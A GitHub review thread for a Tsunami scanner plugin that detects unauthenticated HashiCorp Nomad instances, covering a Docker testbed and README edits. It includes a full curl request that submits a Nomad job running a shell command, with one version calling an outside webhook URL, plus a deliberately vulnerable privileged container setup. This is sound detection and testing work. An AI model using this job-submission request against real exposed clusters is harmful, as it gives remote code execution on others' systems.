Unauthenticated nomad instance

[am0o0]

google/tsunami-security-scanner-plugins#687
google/tsunami-security-scanner-plugins#694

[leonardo-doyensec]

Hello @am0o0.
Thank you for contribution. Can you please implement the testbed using Docker?

Feel free to reach out
~ Leonardo (Doyensec)

[am0o0]

@leonardo-doyensec Hello 👋
Im not sure about Docker since the Nomad need to have docker installed on the system, I'm not sure how it is possible.

[leonardo-doyensec]

What about https://hub.docker.com/r/hashicorp/nomad?

[am0o0]

Ok sorry, let me check further.

[am0o0]

@leonardo-doyensec, I had to use --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw switches to run the Nomad. If you have any other solutions, I'd like to learn :)

[giacomo-doyensec]

Hi @am0o0, I got it working without --privileged just like this

docker run --rm -it \
  -v /sys/fs/cgroup:/sys/fs/cgroup:rw \
  -p 4646:4646 \
  hashicorp/nomad:1.10 \
  agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}'

Could you also provide a safe version of the testbed?
Thanks and feel free to reach out!

[am0o0]

@giacomo-doyensec I appreciate your thorough solution.

@robert-doyensec, I think this PR is ready for review now.

[robert-doyensec]

Hi @am0o0 , sorry for the confusion. I ran into issues confirming the vulnerability with the provided testbed -- it does seem necessary to use --privileged and an exposed docker mount -v /var/run/docker.sock:/var/run/docker.sock when using the docker driver. Additionally, it doesn't seem to work when running on apple silicon due to failure to get the CPU usage. Can you update the README to reflect these, and add a small warning that the container is privileged?

[robert-doyensec]

Please use COMMAND_HERE as stated in the line above, I think you changed this by accident.

Suggested change

curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'

curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'

[robert-doyensec]

Minor changes for clarity

[robert-doyensec]

Suggested change

	# setup an unauthenticated nomad ui (vulnerable)
	# Set Up an Unauthenticated Nomad UI (Vulnerable)

[robert-doyensec]

Suggested change

	you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install
	You can install the Nomad CLI according to the official document: https://developer.hashicorp.com/nomad/install

[robert-doyensec]

Suggested change

	OR base on ubuntu 24.04 with docker run the following command to run nomad:
	OR to run Nomad on Ubuntu 24.04 with Docker run the following command:

[robert-doyensec]

Suggested change

	2. the container doesn't run on the Apple Silicon
	2. The container doesn't run correctly on Apple Silicon due to failure to get CPU usage when creating the job

[robert-doyensec]

Suggested change

	# confirming the exposed ui
	# Confirming the Exposed UI

[robert-doyensec]

Suggested change

	# setup an authenticated nomad ui (safe)
	# Set Up an Authenticated Nomad UI (Safe)

[robert-doyensec]

Suggested change

	# confirming the safe setup
	# Confirming the Safe Setup